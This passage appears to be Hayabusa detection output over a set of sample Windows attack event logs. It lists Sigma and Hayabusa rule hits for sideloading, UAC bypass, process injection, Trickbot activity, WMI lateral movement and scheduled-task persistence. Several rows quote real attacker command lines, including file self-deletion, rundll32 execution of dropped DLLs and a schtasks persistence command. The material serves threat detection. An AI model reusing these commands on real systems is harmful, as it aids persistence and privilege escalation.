Path: C:\Windows\System32\smartscreen.exe : User: MSEDGEWIN10\IEUser : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx +2020-10-15 22:17:02.736 +09:00,MSEDGEWIN10,13,high,New RUN Key Pointing to Suspicious Folder,,rules/sigma/registry_event/sysmon_susp_run_key_img_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx +2020-10-15 22:17:02.736 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx +2020-10-15 22:17:02.737 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Program Files (x86)\Internet Explorer\iexplore.exe"" : Path: C:\Program Files (x86)\Internet Explorer\iexplore.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Users\Public\tools\apt\tendyron.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx +2020-10-17 20:38:58.613 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download : URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-17 20:43:27.499 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\Public\tools\apt\wwlib\test.exe"" : Path: C:\Users\Public\tools\apt\wwlib\test.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:27.499 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:31.484 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\Public\tools\apt\wwlib\test.exe"" : Path: C:\Users\Public\tools\apt\wwlib\test.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:31.484 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:31.484 +09:00,MSEDGEWIN10,1,high,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation/win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:33.495 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart : Path: C:\Users\IEUser\AppData\Roaming\WINWORD.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Users\Public\tools\apt\wwlib\test.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:36.306 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" : Path: C:\Windows\SysWOW64\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:36.306 +09:00,MSEDGEWIN10,1,high,Microsoft Office Product Spawning Windows Shell,,rules/sigma/process_creation/win_office_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:40.902 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\explorer.exe"" : Path: C:\Windows\SysWOW64\explorer.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:40.903 +09:00,MSEDGEWIN10,8,high,CACTUSTORCH Remote Thread Creation,,rules/sigma/create_remote_thread/sysmon_cactustorch.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:45.120 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\IEUser\AppData\Roaming\WINWORD.exe"" : Path: C:\Users\IEUser\AppData\Roaming\WINWORD.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:45.120 +09:00,MSEDGEWIN10,1,high,MS Office Product Spawning Exe in User 
Dir,,rules/sigma/process_creation/win_office_spawn_exe_from_users_directory.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:49.229 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c ping 127.0.0.1&&del del /F /Q /A:H ""C:\Users\IEUser\AppData\Roaming\wwlib.dll"" : Path: C:\Windows\SysWOW64\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:49.229 +09:00,MSEDGEWIN10,1,high,Microsoft Office Product Spawning Windows Shell,,rules/sigma/process_creation/win_office_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:50:02.661 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{ACA8FE61-4C38-4216-A89C-9F88343DF21F}-GoogleUpdateSetup.exe : URL: http://r3---sn-5hnedn7z.gvt1.com/edgedl/release2/update2/HvaldRNSrX7_feOQD9wvGQ_1.3.36.32/GoogleUpdateSetup.exe?cms_redirect=yes&mh=Aq&mip=213.127.67.142&mm=28&mn=sn-5hnedn7z&ms=nvh&mt=1602935359&mv=m&mvi=3&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-17 21:32:08.987 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{8B60600B-E6B4-4083-99F3-D3A4CFB95796}-86.0.4240.75_85.0.4183.121_chrome_updater.exe : URL: 
http://r2---sn-5hne6nsr.gvt1.com/edgedl/release2/chrome/W_YanCvPLKRFNu-eN8kKOw_86.0.4240.75/86.0.4240.75_85.0.4183.121_chrome_updater.exe?cms_redirect=yes&mh=ps&mip=213.127.67.142&mm=28&mn=sn-5hne6nsr&ms=nvh&mt=1602937879&mv=m&mvi=2&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-17 21:32:11.026 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-17 21:32:11.318 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-17 21:32:11.574 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: SetupBinary : URL: https://oneclient.sfx.ms/Win/Prod/20.169.0823.0006/OneDriveSetup.exe,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-17 21:33:56.406 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 01:27:08.081 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: calc.exe : Path: C:\Windows\SysWOW64\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\ProgramData\Intel\CV.exe"" 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx +2020-10-18 01:27:08.734 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.2008.2.0_x64__8wekyb3d8bbwe\Calculator.exe"" -ServerName:App.AppXsm3pg4n7er43kdh1qp4e79f1j7am68r8.mca : Path: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.2008.2.0_x64__8wekyb3d8bbwe\Calculator.exe : User: MSEDGEWIN10\IEUser : Parent Command: ?",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx +2020-10-18 01:27:10.464 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\RuntimeBroker.exe -Embedding : Path: C:\Windows\System32\RuntimeBroker.exe : User: MSEDGEWIN10\IEUser : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx +2020-10-18 07:37:52.809 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:52.892 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:52.956 
+09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:52.991 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:53.047 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:53.111 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:53.169 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and 
Control/bits_openvpn.evtx +2020-10-18 07:37:53.230 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:53.417 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:53.527 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:53.571 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:53.664 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: 
https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:53.771 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:53.807 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:53.867 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:53.928 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:53:05.436 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd.exe /Q /c cd \ 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 : 
Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\Administrator : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-18 07:53:05.436 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-18 07:53:05.676 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd.exe /Q /c cd 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\Administrator : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-18 07:53:05.676 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-18 07:53:05.777 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd.exe /Q /c c:\windows\system32\rundll32.exe c:\programdata\7okjer,#1 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\Administrator : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-18 07:53:05.777 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-20 20:50:54.810 +09:00,DESKTOP-NTSSLJD,1,high,Process Creation Sysmon Rule Alert,"Rule: 
technique_id=T1059.001,technique_name=PowerShell : Command: ""C:\Users\den\Source\Repos\UACME\Source\Akagi\output\x64\Release\Akagi64.exe"" 64 : Path: C:\Users\den\Source\Repos\UACME\Source\Akagi\output\x64\Release\Akagi64.exe : User: DESKTOP-NTSSLJD\den : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 20:50:54.810 +09:00,DESKTOP-NTSSLJD,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 20:50:55.450 +09:00,DESKTOP-NTSSLJD,11,high,UAC Bypass Using IEInstal - File,,rules/sigma/file_event/sysmon_uac_bypass_ieinstal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 20:50:56.490 +09:00,DESKTOP-NTSSLJD,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1036,technique_name=Masquerading : Command: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe : Path: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe : User: DESKTOP-NTSSLJD\den : Parent Command: ""C:\Program Files\Internet Explorer\IEInstal.exe"" -Embedding",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 20:50:56.490 +09:00,DESKTOP-NTSSLJD,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 20:50:56.490 +09:00,DESKTOP-NTSSLJD,1,high,UAC Bypass Using IEInstal - Process,,rules/sigma/process_creation/win_uac_bypass_ieinstal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 20:50:56.569 +09:00,DESKTOP-NTSSLJD,1,high,Process 
Creation Sysmon Rule Alert,"Rule: technique_id=T1059.003,technique_name=Windows Command Shell : Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: DESKTOP-NTSSLJD\den : Parent Command: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-21 07:33:02.063 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\wermgr.exe : Path: C:\Windows\System32\wermgr.exe : User: MSEDGEWIN10\IEUser : Parent Command: rundll32.exe c:\temp\winfire.dll,DllRegisterServer",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx +2020-10-21 07:33:02.063 +09:00,MSEDGEWIN10,1,critical,Trickbot Malware Activity,,rules/sigma/process_creation/win_malware_trickbot_wermgr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx +2020-10-21 07:33:02.064 +09:00,MSEDGEWIN10,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx +2020-10-21 07:35:26.755 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding : Path: C:\Windows\System32\wbem\WmiPrvSE.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx +2020-10-24 06:55:59.769 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: 
C:\Users\IEUser\AppData\Local\Temp\{2015B2D1-1706-42F6-8C0E-8BEECB408D48}-86.0.4240.111_86.0.4240.75_chrome_updater.exe : URL: http://r2---sn-5hnekn7z.gvt1.com/edgedl/release2/chrome/E4_ltUMmNI-KvJYPRyaXng_86.0.4240.111/86.0.4240.111_86.0.4240.75_chrome_updater.exe?cms_redirect=yes&mh=3q&mip=213.127.65.23&mm=28&mn=sn-5hnekn7z&ms=nvh&mt=1603490058&mv=m&mvi=2&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-24 06:57:29.217 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding : Path: C:\Windows\System32\wbem\WmiPrvSE.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:57:36.014 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" conf3234.dll f8753 d948 : Path: C:\Windows\SysWOW64\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: c:\Users\Public\test.tmp ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:57:36.399 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /C schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers : Path: C:\Windows\SysWOW64\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\rundll32.exe"" conf3234.dll f8753 d948",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:57:36.631 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: schtasks /Create /f /XML 
C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers : Path: C:\Windows\SysWOW64\schtasks.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:57:36.631 +09:00,MSEDGEWIN10,1,low,Scheduled Task Creation,,rules/sigma/process_creation/win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:57:36.631 +09:00,MSEDGEWIN10,1,high,Suspicius Add Task From User AppData 